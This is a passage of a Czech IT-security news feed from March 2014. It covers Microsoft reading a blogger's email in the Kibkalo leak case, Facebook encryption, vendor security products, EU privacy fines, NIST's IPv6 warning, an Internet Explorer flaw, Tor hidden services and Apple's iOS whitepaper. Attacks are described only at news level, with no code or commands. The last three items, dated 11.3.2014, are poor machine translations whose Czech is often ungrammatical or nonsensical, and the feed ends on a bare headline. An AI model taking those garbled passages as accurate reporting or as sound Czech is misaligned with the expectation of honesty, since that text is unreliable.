Velké riziko však pro uživatele představují zejména aplikace umístěné mimo oficiální distribuční kanály. U aplikací umístěných na stránkách třetích stran lze předpokládat vyšší riziko, že půjde o škodlivé programy. Hlavně v současné době jde přitom o častý způsob šíření aplikací pro chytré brýle.

Nejlepší možnou ochranu je tak nyní stahovat aplikace pouze z obchodu MyGlass a být opatrní při používání aplikací z jiných úložišť.


Microsoft a spol. mohou číst vaše emaily

31.3.2014 Špionáž
Velcí provozovatelé internetových služeb si vyhrazují právo číst obsah uživatelských emailů v případě, že k tomu mají vážné důvody.

Případ propuštěného zaměstnance Microsoftu Alexe Kibkala, který s jistým francouzským blogerem sdílel kód Windows 8, Windows RT a interní Activation Server SDK, ukázal na zvláštní praktiky některých technologických gigantů. Microsoft totiž v rámci vlastního vyšetřování vstoupil do emailové schránky tohoto blogera a přečetl si jeho korespondenci s Kibkalem. Bloger používal službu Microsoftu Hotmail, která nyní funguje pod názvem Outlook.com.

Microsoft přitom jednal v souladu s vlastními pravidly. V těch se uvádí, že Microsoft může číst uživatelské emaily v případě, že tím chrání majetek společnosti. V případě emailové schránky francouzského blogera tomu tak bylo.

Microsoft však není jediný, kdo si vyhrazuje právo číst cizí komunikaci. Podobná zadní vrátka mají i v Applu, Yahoo nebo Googlu.

Yahoo po svých uživatelích požaduje souhlas s tím, že společnosti vědomě umožňují přístup do jejich emailové schránky a jejímu veškerému obsahu. Yahoo zde stejně jako Microsoft ještě dodává, že této možnosti využije pouze v nezbytných případech pro ochranu svých práv. Téměř identické znění mají v tomto bodě i pravidla Googlu a Applu.

Jediný, kdo se k možnosti číst cizí emaily vyjádřil, byl Microsoft. Yahoo, Apple a Google odmítli věc komentovat. Microsoft dokonce již stihl upravit svá pravidla tak, aby vstup do uživatelské schránky byl jen poslední možností.

Podle Charlieho Howea, ředitele společnosti Skyhigh Networks, která nabízí cloudové bezpečnostní řešení, je hlavní problém v tom, že jde v podstatě o legální aktivitu. Uživatelé se zpřístupněním vlastních dat souhlasí téměř u každé cloudové služby – ať už tak činí vědomě, či nikoliv. Platí totiž známé pravidlo, že pravidla téměř nikdo nečte.


Bývalý zaměstnanec Microsoftu zatčen, vyzradil firemní tajemství

31.3.2014 Špionáž
Známý portál Wzor.net je nedostupný jen den poté, co byl jeho autor Alex Kibkalo obviněn z krádeže obchodních tajemství a zmizel i jeho účet na sociální síti Twitter.

Není zatím jasné, zda mezi ukončením provozu Wzor.net a obviněním bývalého zaměstnance Microsoftu existuje nějaká spojitost. Podle testování Computerworldu je Wzor.net offline a nedostupný ze Spojených států, Velké Británie, Ukrajiny i České republiky. Aplikace, které testují, zda je daná webová stránka aktivní a běží (například Where´s It Up a Is It Down Right Now?), ukazují, že Wzor.net je offline po celém světě.

Twitterový účet Wzor.net zmizel z internetu ve čtvrtek ráno. „Omlouváme se, stránka neexistuje,“ uváděl Twitter při snaze o přistoupení k účtu. Ve středu ráno se objevily informace o tom, že byl zadržen Alex Kibkalo, ruský občan, který pracoval v libanonské pobočce Microsoftu. Mezi lety 2005 a 2010 pak pracoval v ruské divizi Microsoftu. Kibkalo byl obviněn z toho, že sdílel s nejmenovaným francouzským blogerem kód Windows 8, Windows RT a interní Activation Server SDK (software development kit). Francouzský bloger byl zatčen jen den po zadržení Kibkala a nyní je vyslýchán policejními složkami.

Wzor.net byla stránka v ruském jazyce známá tím, že na ní byly jako na jedné z prvních zveřejňovány informace o Windows a vývojářské verze tohoto operačního systému ještě před vydáním finálních verzí. Minulý měsíc se na tomto webu objevil jedna z prvních verzí systému Windows 8.1, který má Microsoft vydat 8. dubna. Policie se se soudním příkazem dostala do Hotmailu a logů rychlých zpráv Kibkala, z nichž vyplývá, že tento muž zpřístupnil francouzskému blogerovi i počáteční verze Windows 7 a Windows 7 SP1 několik měsíců před vydáním jejich finálních verzí.

Kibkalo pracoval v Microsoftu podle svého profilu na sociální síti LinkedIn sedm let od května 2005 do září 2012. Muž byl z Microsoftu vypovězen po skončení interního vyšetřování vedeného divizí v Microsoftu s názvem Trustworthy Computing Investigations (TWCI), v rámci nějž byly nalezeny e-maily blogerovi. Kibkalo s tímto mužem sdílel i aktivační kód SDK přes svůj účet na SkyDrive. Podle FBI Rus navíc spustil virtuální server na serveru Microsoftu tak, aby svá jednání skryl. Microsoft se k otázkám, zda je výpadek Wzor.net nějak spojen s případem Kibkala, zatím nevyjádřil. K případu Kibkala mluvčí Microsoftu pouze uvedla: „Ochranu našeho duševního vlastnictví bereme velmi vážně a příslušným vládním agenturám předáváme všechny potřebné podklady.“


Šifrování na Facebooku je stále omezené

31.3.2014 Zabezpečení
Uživatelé nemají příliš možností, jak chránit svou komunikaci před kyberzločinci a vládními odposlechy.

Facebook neustále pracuje na zlepšování bezpečnostních protokolů a šifrovacích metod. Součástí jeho boje proti vnějším útokům je například i štědrý program odměn pro jedince pátrající po bezpečnostních chybách Facebooku nebo používání protokolu HTTPS, jehož zásadním nedostatkem je však fakt, že dešifrování komunikace probíhá ještě na datovém centru a nikoliv až na uživatelském počítači.

Jako nejlepší způsob ochrany uživatelské komunikace se proto jeví tzv. end-to-end šifrování, u kterého do šifrované komunikace nevidí ani samotný Facebook. Společnost má však s tímto mechanismem dlouhodobě problém.

Podle bezpečnostního ředitele Facebooku Joea Sullivana nedošlo k nasazení technologie kvůli její velké složitosti. Pro průměrného uživatele je prý velmi obtížně komunikovat pomocí end-to-end šifrování. „Pokud end-to-end šifrování používáte v emailové komunikaci, pak víte, o čem mluvím,“ řekl Sullivan, který tak naráží na potřebu ruční výměny veřejného klíče mezi odesílatelem a příjemcem – zvlášť pro každou zprávu.

Pokud uživatelé Facebooku chtějí tento typ ochrany přesto využít, mají na výběr z několika aplikací třetích stran. Facebook se prý podle Sullivana snažil přijít s vlastním řešením, ale neúspěšně. Podpora cizích aplikací je tak zatím jediné, co může v této věci udělat.

Jednou z těchto aplikací je Pidgin, kterým lze šifrovat komunikaci vedenou přes vlastní aplikaci Facebooku Messenger. Možnost, že by end-to-end šifrování zakomponoval do Messengeru přímo Facebook, Sullivan nechtěl komentovat.

Zájem uživatelů o zabezpečení vlastní komunikace přitom v poslední době výrazně vzrostl. Velkým dílem o to zasloužila NSA se svým špehovacím programem, ale i jiné organizace vedoucí hromadné útoky na uživatelské soukromí.

Důležitost šifrování minulý týden zdůraznil také Edward Snodwden, který se na dálku zúčastnil konference SXSW v americkém Austinu. Protokoly používané na Facebooku, Googlu nebo ve Skypu podle něj stále nechávají uživatelská data napospas tajným službám, protože nevyužívají end-to-end šifrování.


Softwarově definovat už jde i bezpečnostní architektura

31.3.2014 Bezpečnost
Řešení Software-Defined Protection (SDP, softwarově definovaná ochrana) představil Check Point Software.

Podle něj jde o revoluční bezpečnostní architekturu, která usnadní ochranu v rychle se rozvíjejícím světě IT i hrozeb. Novinka představuje třívrstvou bezpečnostní architekturu složenou ze segmentů pro vynucování, kontrolu a správu.

Přitom se odděluje vrstva správy od vrstvy vynucování, což umožňuje nastavit robustní a spolehlivé body pro vynucování s aktualizací ochrany v reálném čase z kontrolní vrstvy.

SDP využívá pro okamžitou ochranu informace o hrozbách z e sítě svých senzorů a nabízí modulární správu a otevřenou strukturu řízení.

„Softwarově definovaná bezpečnostní architektura Check Pointu pomůže IT týmům lépe redesignovat zabezpečení podnikových sítí s ohledem na současné IT prostředí bez geografického omezení i s ohledem na dynamický svět hrozeb,“ charakterizuje novinku Charles Kolodgy, viceprezident pro výzkum v IDC.

„Existuje velké množství bezpečnostních produktů, které jsou ale spíše reaktivní a taktické povahy, než aby byly orientované architektonicky. V reakci na tuto mezeru jsme vyvinuli softwarově definovanou ochranu a poskytujeme organizacím agilní a zabezpečenou bezpečnostní infrastrukturu,“ dodává Amnon Bar-Lev, prezident společnosti Check Point.


Detekce chování odhalí nezvané hosty

31.3.2014 Bezpečnost
Své bezpečnostní portfolio rozšířilo Cisco o řešení Cognitive Threat Analytics, které vyvinula česká firma Cognitive Security, již Cisco před rokem koupilo.

Konkrétně jde o intuitivní cloudové bezpečnostní řešení, které se dokáže samo učit a ke zjišťování škodlivých jevů využívá behaviorální modelování a detekci anomálií v běžném provozu sítě. Podle výrobce tím zkracuje čas vedoucí k odhalení hrozeb působících uvnitř sítě.

Jako novou součást portfolia představilo Cisco také řešení Advanced Malware Protection (AMP), které původně vyvinula firma Sourcefire, již vloni Cisco také převzalo. Řešení se implementovalo do portfolia nástrojů Content Security pro zabezpečení webových, e-mailových a cloudových služeb.

AMP slouží k ochraně před pokročilými útoky a poskytuje neustálý monitoring i analýzy napříč sítí a ve všech fázích kybernetického útoku – před ním, během něj i po něm.

AMP i Cognitive Threat Analytics jsou k dispozici jako volitelný doplněk pro řešení Cloud Web Security. Nová řešení jsou podle výrobce efektivnější než dřívější přístupy zaměřené na vyhledávání vzorků konkrétních typů malwaru, jejichž vytvoření pro každý nový druh škodlivého kódu však může trvat řadu dní.

AMP například nabízí takové postupy jako zjišťování reputace souborů (analyzuje soubory probíhající sítí a uživateli poskytuje informace o tom, jaké soubory byly na základě nastavení zablokovány), dále sandboxing (pomáhá v izolovaném prostředí sledovat a pochopit chování malwaru) či retrospektivní analýzu souborů, jejíž pomocí se řeší situace, kdy soubory, které již prošly perimetrem, se považují za hrozbu.


Osobní údaje: Americké společnosti se bojí evropských pokut

31.3.2014 Bezpečnost
Ve středu odsouhlasený zákon na ochranu soukromí platí pro všechny firmy podnikající v evropském prostoru a pokuty budou opravdu bolet.

Evropský parlament vždy bral právo na ochranu soukromí vážně. Je to jedna z věcí, která jasně dělí EU a USA – zatímco v Evropě je chráněno obecnými zákony a směrnicemi a příliš na tom nemění žádná konkrétní forma komerčního vztahu mezi vlastníkem dat a jejich zpracujícím, ve Spojených státech jistota soukromí de facto končí s hranicemi vlastního domova a dále jsou chráněny jen konkrétní případy konkrétními zákony (respektive jich spletí, která se průběžně rozrůstá).

Samozřejmě v řadě případů (například při koupi letenek a cestování mezi kontinenty) je nezbytné informace sdílet a dochází ke konfliktům mezi různými pohledy na soukromí. Řeší to různé směrnice a regulace, jako je například Safe Harbor. Ovšem jak prozradil Edward Snowden, všechny podobné dohody byly v průběhu let zcela pošlapány. Evropskému parlamentu došla trpělivost a ve středu odhlasoval zákon s definovanou penalizací, která bude platit nejen pro firmy evropské, ale pro každého, kdo podniká v Evropské unii.

Zákon postihuje i transport dat mimo EU bez explicitního povolení nebo používání dat v rozporu s prohlášeními na korporátních webech. Úniky dat musí být hlášeny co nejrychleji, nejlépe do 24 hodin od jejich zjištění, a v případě, že se tak nestane, bude třeba odesílat zdůvodnění příslušným úřadům. Společnosti se budou muset přizpůsobit ve čtyřech klíčových oblastech.

Nejkonkrétnějším novinkou je vytvoření místa Data Protection Office, které je povinné pro všechny firmy s více než 250 pracovníky. Funkce DPO půjde nad rámec přehlížení problematiky, bude zřejmě muset ovlivňovat strategii během vývoje produktů. Doporučuje se vytvořit komisi a pracovní skupiny, které bude dohlížet na každou fázi vzniků produktů a služeb.

Podstatné je, že společnosti se nebudou muset přizpůsobovat jednotlivým národním regulátorům, i když ten místní bude jejich primárním kontaktem. Změny nepochybně zkomplikují nasazování technologií, jako jsou sociální sítě, či obecně cloudy, jejichž provozovatel bude muset získat povolení EU před tím, než uvolní osobní data občanů EU do jiné země. Řada pozorovatelů ze soukromého sektoru samozřejmě varuje před dopadem na kompetitivnost Evropy a na nezbytnost vyjasnění rozporů a nekonzistencemi zákonných úprav jako je Data Protection Regulation a ePrivacy Directive.

V každém případě především americké firmy vyjadřují své zděšení nad možnými pokutami, které mohou dosáhnout výše 100 milionů euro nebo 5 procent globálního ročního obratu, podle toho, co je větší.


Protokol IPv6 může přinést nové bezpečnostní problémy

31.3.2014 Bezpečnost
Americký National Institute of Standards and Technology (NIST) varuje před nepromyšleným přechodem z IPv4 na IPv6.

Řada vlád a jejich úřadů má velké zpoždění oproti vlastním termínům pro implementaci nového internetového protokolu IPv6. Přechod z IPv4 mohou blokovat i bezpečnostní oddělení, například pokud se řídí doporučením americké organizace NIST.

Samozřejmě nadále platí důvody k urychlenému přechodu na internetový protokol IPv6. Adresy IPv4 jsou jednotlivým poskytovatelům centrálně přiřazovány po velkých blocích, které se dále dělí mezi konkrétní zákazníky. To všem není zcela efektivní využití spojitého adresního prostoru a díky divokému růstu Internetu v předchozích letech hrozilo jeho bezprostřední vyčerpání. V případě IPv6 je množství možných adres o tolik větší, že jejich přidělování již nikdy problémem nebude.

Samozřejmě, jak se několikrát ukázalo, krize nedostatku adres IPv4 se několikrát odkládala. Jedním z důvodů je především omezení používání vnějších statických IP adres. V takových případech jsou skupiny zařízení skryté prostřednictvím techniky překladu adres ukryté za adresou jedinou a samy pro vzájemnou komunikaci používají typ adres určených pro privátní adresy, které lze používat ve více organizacích současně.

Typickým příkladem poskytovatelů internetu, kteří takto postupují, jsou mobilní operátoři. Ti provozují miliardy uživatelů, ale při tom je jejich spotřeba jedinečných adres minimální. Současně probíhají pokusy o jakousi burzu adresních bloků, které se ale příliš nerozšířily, protože znamenaly zbytečné komplikace pro operátory, kteří si stejně drží řadu adres v rezervě.

Úřad NIST svým varováním o potenciálních hrozbách spojených s IPv6 přechodu příliš nepomůže. Podle jeho pracovní skupiny většina vládních organizací používá sítě navržené pouze pro práci s IPv4 a běh obou generací protokolů současně je problematický. Současně bezpečnostní nástroje mají potíže chránit i zařízení IPv4 přes desetiletí, po které jejich výrobci sbírali zkušenosti. A existují oprávněné obavy, že řada útočníků experimentuje s novými typy útoků a čeká na okamžik přepnutí cílových sítí. Pravděpodobnost útoků je proto velmi vysoká. Dokumenty pracovní skupiny NIST dokonce citují důkazy, že útočníci našli způsoby, jak tunelovat ze sítí IPv4 do IPv6 se současným obejitím bezpečnostních opatření.

Představitelé bezpečnostních výrobců nesouhlasí. Například podle Microsoftu s protokolem IPv6 pracoval již systém Windows XP SP 2. V té době měl spíše formu doplňkového modulu, ale byl testován ve velkém množství prostředí a zařízení. Všechny moderní verze Windows již mají přepracovaný TCP-IP stack ve svých základech a jsou zcela připraveny na nasazování do moderních sítí a není třeba se ničeho obávat.

NIST ovšem nesouhlasí a doporučuje, aby veškerá komunikace přes IPv6 byla v sítích blokována, dokud nebudou implementovány adekvátní bezpečnostní protokoly. Existuje dostatečné množství malwaru, připraveného na útoky, který dosud není aktivní z jednoduchého důvodu – že sítě IPv6 prostě nejsou k dispozici.


Berners-Lee: Svobodný internet je důležitý. Občas.

31.3.2014 IT
Zakladatel webu, Tim Berners-Lee se ve středu zúčastnil na Redditu akce AMA (ask me anything – zeptejte se mě na cokoliv) a odpovídal i na otázky ohledně dohledu vlády nad internetem a DRM.

Akce byla součástí oslav čtvrtstoletí existence webu. V kontrastu s komentáři pro média jako CNN nebo The Guardian, kde prosazoval otevřený web, zaujal Berners-Lee na Redditu o něco konzervativnější postoj.

„Pokud nebudeme mít otevřený a neutrální internet, na který se můžeme spolehnout bez obav o to, co se děje na pozadí, nemůžeme mít otevřenou vládu, dobrou demokracii, zdravotní péči, ani propojené komunity a rozdílnost kultury,“ řekl magazínu Guardian. „Není naivní si myslet, že to můžeme mít, je však naivní myslet si, že můžeme jen sedět s rukama v klíně a všechno to získat.“
Nezávislý web

Po nezávislosti webu Berners-Lee volal i v podobném rozhovoru s CNN, na Redditu se však k situaci vyjádřil jinak. „Myslím, že nějaké monitorování internetu vládními agenturami bude potřebné v boji se zločinem,“ napsal. „Potřebujeme vynalézt systém, který tuto bezprecedentní sílu ovládá a vyvažuje, abychom byli schopni vyšetřovat a držet agentury, které se tím zabývají, odpovědné veřejnosti.“
DRM

Tato dvě tvrzení nejsou nutně vzájemně neslučitelná. Ale Berners-Lee byl znovu nucen obhájit svou podporu ochranu digitálního obsahu pomocí DRM. „Otázka DRM podle mě není tak jednoduchá. Lidé chtějí sledovat velké filmy a DRM je v mnoha ohledech přítěží, ale pokud používáte Netflix nebo jste si koupili DVD, je DRM součástí vašeho života. Souhlasím však, že je zákon o autorských právech, DMCA a CFAA silně nedokonalý a potřebuje opravit nezávisle, ale to je jiný problém než DRM.“

„Web je primárně neutrální nástroj pro lidstvo,“ napsal dále. „Když se na lidstvo podíváte, vidíte dobré i špatné, úžasné i hrozné. Mocný nástroj může být použit k dobru nebo ke zlu. Věci, které jsou opravdu špatné, jsou ilegální na webu stejně jako mimo něj.“

Berners-Lee také vyjádřil svůj kladný vztah k mikroplatbám, svým rodičům, nástrojům kontrolujícím pravopis a ke koťatům.


Chyba v IE odhalila mezery v aktualizačním systému Microsoftu
31.3.2014 Zranitelnosti
Rychlost, jakou kyberzločinci zneužili zranitelnosti objevené v IE v polovině února, ukazuje na nedostatky v aktualizačním mechanismu Microsoftu.

Na závažnou zranitelnost v prohlížeči Internet Explorer 10, která by případným útočníkům umožnila vzdálené spuštění škodlivého kódu na uživatelském zařízení, bezpečnostní výzkumníci poprvé upozornili 13. března poté, co si všimli napadení webu francouzské Asociace leteckých výrobců. Toto sdružení má přes 300 členů.

Asi týden po objevení chyby Microsoft uvolnil modul Fix It, který uživatelům poskytoval dočasnou ochranu před vydáním opravné aktualizace. Problém je podle analytiků v tom, že o těchto modulech ví jen málo uživatelů. Firmy samozřejmě mohly ještě provést přechod na novější IE 11, který danou zranitelnost neobsahuje, ovšem takové změny rozhodně nejsou pro firemní uživatele snadnou záležitostí.

Po svém zveřejnění se zranitelnost přirozeně dostala také do pozornosti internetových útočníků. Ti ji okamžitě začali využívat ke svým operacím. Podle bezpečnostní společnosti Websense se obětmi útoků stalo hned několik webových stránek. Mělo prý dojít k napadení stránek jisté japonské cestovní kanceláře, taiwanské školy či hongkongské univerzity. Rychlá reakce útočníků podle Websense ukazuje na jejich snahu bezpečnostní díru maximálně využít k rychlému obohacení.

Microsoft za svůj systém oprav obvykle ze strany bezpečnostních expertů sklízí pochvalu. Opravné aktualizace přináší pravidelně každý měsíc a v případě nouze i častěji. Například Oracle tak činí čtvrtletně a Cisco dokonce jen dvakrát do roka.

Podle některých expertů by se přesto v tomto směru dalo udělat více. Shodují se například v potřebě rychlejších aktualizačních cyklů. Zejména v případě IE by se prý mělo upustit od měsíčního cyklu a uvolňovat aktualizace co nejdříve po odhalení zranitelnosti.

S takovým řešením by však zase mohly mít některé společnosti problém. Pro ty by proto bylo vhodnější, aby vhodně zvolenými opatřeními zamezily v přístupu k citlivým datům prostřednictvím potenciálně zranitelného prohlížeče. Navíc ne každá zranitelnost je rizikem pro všechny – firmy se mohou po vyhodnocení zranitelnosti samy rozhodnout, jestli opravnou aktualizaci potřebují či nikoliv.


TOR hostí denně 900 anonymních služeb

31.3.2014 Bezpečnost | Kriminalita
Každý den probíhá v systému TOR (The Onion Router, tedy „cibulové směrování") na 900 skrytých služeb.

Vyplývá to z průběžné analýzy Kaspersky Lab. Aktivita kybernetického zločinu v systému TOR navíc narůstá.

TOR je primárně neomezený a volný systém fungující pomocí internetu, jehož uživatelé si vyměňují zprávy ve fórech, komunikují skrze textové služby a provádějí další, zdánlivě běžné, operace.

Podstatným rozdílem je ale to, že jim TOR umožňuje zůstat během všech aktivit zcela anonymními, nelze identifikovat jejich IP adresu a tím pádem určit, kdo reálně za činností stojí. Navíc tato služba poskytuje takzvané pseudodomény, které zabraňují jakémukoli zjištění osobních informací o uživateli.

V poslední době kybernetičtí zločinci začali TOR aktivně využívat k provozování malwarové infrastruktury. Analytici Kaspersky Lab například odhalili trojského koně Zeus s funkcemi TOR a také prvního mobilního trojského koně pro Android ChewBacca. Síť TOR má řadu zdrojů věnovaných právě malwaru – řídící (C&C) servery, správcovské panely apod. Tím je značně ztížena možnost jejich identifikace nebo eliminace, je obtížné dát ja na blacklist.


Apple aktualizoval whitepaper systému iOS

31.3.2014 iOS
Aktualizace dokumentu k iOS odhaluje detailní informace o propracované bezpečnostní architektuře systémů zařízení iPhone a iPad.

33stránkový whitepaper nazvaný iOS Security byl vydán v únoru 2014 a je nyní k dispozici online (ve formátu PDF). Předchozí verze je datována do listopadu 2012, přibližně do doby, kdy firma Apple začala bezpečnosti věnovat zvýšenou pozornost. Nový dokument detailně popisuje nové bezpečnostní funkce, které byly uvedeny do systémů iOS, především verze 7: Snímač otisků prstů Touch ID, integrace jednotného přihlášení do korporátních aplikací a služeb, zabezpečení spojení konektivity Airdrop (ať už Wi-Fi nebo Bluetooth), iCloud Keychain pro generování a správu silných hesel a v neposlední řadě Secure Enclave, bezpečnostní koprocesor integrovaný do 64bitového procesoru Apple A7.

Whitepaper je podle bezpečnostních konzultantů zásadní změnou v přístupu Applu a jak říká Rich Mogull: „Obsahuje více informací o bezpečnosti iOS, než kdy Apple oficiálně uvolnil. Studiem tohoto dokumentu strávíme měsíce.“ Z tohoto pohledu se Apple donedávna choval jako Microsoft před deseti lety, kdy bylo zvykem uveřejňovat co nejméně informací o bezpečnostních standardech.

Detaily bezpečnostní architektury Apple, včetně její certifikace podle normy FIPS 140-2, nepochybně dále pomohou otevírat dveře do vládních agentur nebo korporací s extrémními bezpečnostními požadavky. „Řada profesionálů dosud nepovažovala produkty Apple za dostatečně zralé pro korporátní či státní bezpečnost, ale Apple se možná pomalu stává standardem v mobilní bezpečnosti. Již nyní jsou možná zařízení Apple zabezpečenější než jakékoli jiné běžně dostupné zařízení.“

To ale neznamená, že neexistuje spousta prostoru pro zlepšení, jak to ukázala poslední bezpečnostní konference RSA, kde bylo předvedeno několik způsobů, jak se mohou aplikace běžící na pozadí nerootovaného iPhonu dostat například ke všem dotekům na obrazovce a fungovat tedy jako typický keylogger. To představuje chybu spíše systémové architektury než autorů jednotlivých aplikací, i když na ty vina za bezpečnostní nedostatky nejčastěji padá. Na analýzu bezpečnostních slabin aplikací dostupných pro iOS se zaměřil výzkum firmy HP publikovaný v listopadu 2013. Testováno bylo více než 2000 mobilních aplikací používaných 600 velkými korporacemi v 50 zemích světa a jak se ukázalo, 90 procent z nich vykazovalo nějakou bezpečnostní slabinu či chování, od nepoužívání šifrování po data ukládaná v zařízení nebo dokonce přenášená po internetu.


HTTPS nelze věřit zakrýt vlastní on-line aktivity
11.3.2014 Bezpečnost
HTTPS byl původně použit k prokázání uživatelům internetu, že web a webový server, s nimiž komunikují jsou skutečně ty, které chtějí komunikovat s, ale později toto použití bylo rozšířeno k udržení uživatel komunikace, identity a prohlížení webových stránek v soukromí.

Ale skupina vědců se, bohužel, ukázalo, že HTTPS je mizerný soukromí nástroj, a že každý, kdo může prohlížet, nahrávat a analyzovat provoz návštěvníků lze identifikovat - s přesností 89 procent - na stránky, které jste navštívili a osobní údaje, které mají sdílené. skupina složená z vědců z UC Berkeley a Intel Labs je zachycen provoz návštěvníků na deset populární zdravotní péči (Mayo Clinic, Plánované rodičovství, Kaiser Permanente), financí (Wells Fargo, Bank of America, Vanguard), právních služeb (ACLU, Právní zoom) a streaming videa (Netflix, YouTube), webové stránky. "Náš útok se týká sdružování techniky identifikovat vzory v provozu. jsme pak použijte Gaussovo rozdělení určit podobnosti ke každému clusteru a mapových vzorků dopravních do pevné šířky reprezentace kompatibilní s širokým Rozsah strojového učení techniky. Vzhledem k podobnosti s přístupem Bag-o-slov dokumentovat klasifikace, naleznete na technice jako Bag-of-gaussovských rozostření (bog), "vysvětlili v whitepaper . "Tento přístup nám umožňuje identifikovat konkrétní stránky v rámci webové stránky, i když stránky mají podobnou strukturu a sdílené prostředky. " závislosti na webové stránky, které interagují s, tento typ útoku může mít mnoho důsledků pro uživatele internetu, jak detaily, jako jsou zdravotní stavy, které mají nebo léčebných postupů, které mají nebo uvažujete o nutnosti může být odhalen, právní problémy, které mají a mohou být zobrazeny akce, které může trvat, a finanční produkty, které používají a videa, které sledují mohli poukázat na informace, které by chtěl být skryté od nikoho jiného než sami sebe. Kdo může využít takový útok? No, každý, kdo má přístup k těmto webových stránkách a můžete zachytit provoz obětí -. V praxi to znamená, že poskytovatelé internetových služeb (ať už pracují pro vládu, nebo ne), zaměstnavatelé sledování online aktivity svých zaměstnanců, a zpravodajské agentury Naštěstí, oni si mysleli, z několika obranných technik, které, pokud by byla provedena, mohou výrazně snížit přesnost takového útoku. Také, oni poukázal, existují i jiné věci, které mohou mít vliv na účinnost útoku je. "K dnešnímu dni, všechny přístupy předpokládat, že oběť prochází web v jedné kartě, a že po sobě jdoucí načtení stránky lze snadno vymezeny. Budoucí práce by měla zkoumat skutečné uživatel praxe v těchto oblastech a vliv na výsledky analýzy. Například, zatímco mnoho uživatelů má více otevřených záložek najednou, to je jasné, jak velký provoz karta generuje jednou stránka je provedeno načtení. Kromě toho, že nevíme, jak snadno provoz z samostatné stránce zatížení může být vymezena s ohledem souvislý proud uživatelský provoz, "oni si všimli. "Konečně, naše práce předpokládá, že oběť skutečně odpovídá struktuře odkaz na webové stránky. V praxi to může být možné vyhovět uživatelům, kteří nepřilne k nosné konstrukci odkaz. "


Počítačoví zločinci stále více přitahuje Tor anonymity a skrytých služeb
11.3.2014 Kriminalita
Původně vytvořen s cílem pomoci političtí disidenti obejít omezení provozu a skrýt své online aktivity z autoritářských vlád, anonymita sítě Tor již dávno stal skvělý nástroj pro počítačové podvodníci skrýt své trestné činnosti a infrastrukturu. "I když infrastruktura Tor a cybercriminal zdroje nejsou ve stejném rozsahu jako konvenční internetu, se nám podařilo najít přibližně 900 skryté služby on-line v současné době, "Kaspersky Lab expert Sergey Lozhkin sdíleny v nedávném blogu. "Tam jsou také cca 5500 uzly celkem a 1000 výstupních uzlů, ale možnost vytvoření anonymní a zneužívání bez podzemní fórum, na trhu nebo malware C & C serveru je přilákat více a více zločinců k síti Tor. " Tor je ideálním místem pro skrytí škodlivý infrastrukturu v podobě skrytých služeb . Tu a tam výzkumníci bezpečnostní objevovat nové trestné činnosti pomocí Tor hostit C & C serverům své malware kontakty pro instrukce ( Chewbacca POS Trojan , Torec Android Trojan ., atd.) Takové C & C servery mají řadu výhod: je těžké objevit a vypnout , stejně jako těžké blacklist. Tor se také stala skvělým úkrytem pro podzemní trhy, které se zabývají v nelegálních předmětů. Silk Road se, na nějaký čas, se stal synonymem pro tyto trhy, ale od té doby svého vzniku, a to zejména po jeho takedown orgány Spojených států, nesčetné množství dalších se objevovaly jako houby po dešti, a svým zákazníkům i nadále nabízet a kupovat drogy , zbraně, malware, padělky, nelegální služby, ukradl osobní a finanční údaje, a tak dále (klikněte na screenshotu pro zvětšení): Konečně, vše, co "vydělal" peněz musí být prány předtím, než skončí v rukou zlodějů . A opět, Tor je ideální místo, jak to udělat, protože nabízí služby užitečné Bitcoin s praním špinavých peněz. "Počítačoví zločinci mohou vytvořit účet, depozitní bitcoins a budou rozděleny do různých veličin, přenesena přes desítky různých peněženek, aby jakékoliv vyšetřování velmi složité, "poznamenal Lozhkin.


Nahlédnout do Číny rychle se rozvíjející mobilní cybercriminal podzemí
11.3.2014 Mobil
Cybercriminal podzemní trh Každá země má odlišné vlastnosti, a 500 milionů národních uživatelů mobilního internetu a číslo neustále roste, čínská podzemní trh je zaplaven s počítačoví podvodníci nákup a prodej služby a zařízení, zaměřené na využití z nich. Vědci senior hrozeb společnosti Trend Micro Lion Gu byl čisticí fóra, internetové obchody a QQ chaty, aby nám o tom, co se vlastně děje na tomto rychle se rozvíjejícím mobilním podzemí. Mobilní aplikace, které tajně objednat uživatelům nejnovějších služeb jsou, přirozeně, velmi oblíbený u kybernetických podvodníků v Číně ve zbytku světa. Premium servisní čísla lze také zakoupit na podzemních trzích. Síťové dopravci obvykle přiřadit čísla prémiové služby kvalifikovaných poskytovatelů služeb, ale samozřejmě některé z nich nejsou nepříznivé jejich prodeje na zločince. Dalším typem škodlivého SMS odesílání aplikací jsou tzv. SMS spedice - aplikace, které textové zprávy zachytit nesoucí citlivé údaje a předá ji podvodníci. Tyto zprávy zahrnují ty s resetem hesla, ověřování kódů, atd. "jako prémie služeb zneužívají, ale také odstranit textové zprávy zachycují skrýt stopy infekce. Pokud se zločinci sehnat uživatelská jména obětí v určitých místech, mohou snadno měnit hesla a převzít kontrolu nad ukradených účtů, "Gu upozorňuje . Dále jsou SMS a iMessage spam software a zařízení. Tento typ spamu obvykle přináší nežádoucí a pricy nabídky zboží a služeb, jakož i vede uživatele na stránky hosting malware nebo phishing formy. rozesílat spamy v obrovských počtech, mohou podvodníci koupit a používat řadu různých zařízení. GSM modemy mohou i odesílat a přijímat textové zprávy, a fungují jako normální mobilní telefon. Stačí vložit SIM kartu (nebo více), a můžete se do toho. Stačí jít dát představu: 16-slot (se SIM kartou v každé) GSM modem můžete posílat 9.600 textových zpráv za hodinu.

Internet krátkých textových zpráv brány může dělat to ještě rychleji. Tato zařízení jsou obvykle poskytovány na poskytovatele služeb o mobilních operátorů sítí, ale může být samozřejmě zneužity počítačovými podvodníky stejně. SMS server - také známý jako "falešné základnové stanice" - je frekvence hardware rádio, které můžete posílat softwarové definované rádiové signály ve frekvenčních pásmech GSM. "Při spuštění, SMS server oznamuje sebe jako základnové stanice zasláním high-power signál, který nutí všechny v okolí mobilní telefony odpojit od oprávněných základnových stanic svých síťových dopravců, a místo toho se připojit k serveru SMS . SMS server pak může vystrčit spam do mobilních telefonů, "vysvětluje Gu." Po dokončení se SMS serveru odpojí od mobilních telefonů, které jsou pak přepojených jejich oprávněným základnových stanic. " iMessage spam počítačový software najde telefonní čísla vázány na Apple zařízení a odesílá zprávy k ní. Telefonní číslo, skenování služby jsou také populární SMS spammeři, kteří nechtějí ztrácet čas a úsilí zasláním spamu na čísla, která jsou dočasně nebo už ne v použití. Konečně, tam jsou služby, které nabízejí ke zvýšení hodnosti škodlivých aplikací na App obchodech třetích stran, které jsou dominantní v Číně. Všechny z těchto zařízení a služby přicházejí za cenu, a můžete se podívat na typické ceníky na Gu je whitepaper .


Cybersecurity se týká stává problémem zasedací místnost
11.3.2014 Bezpečnost
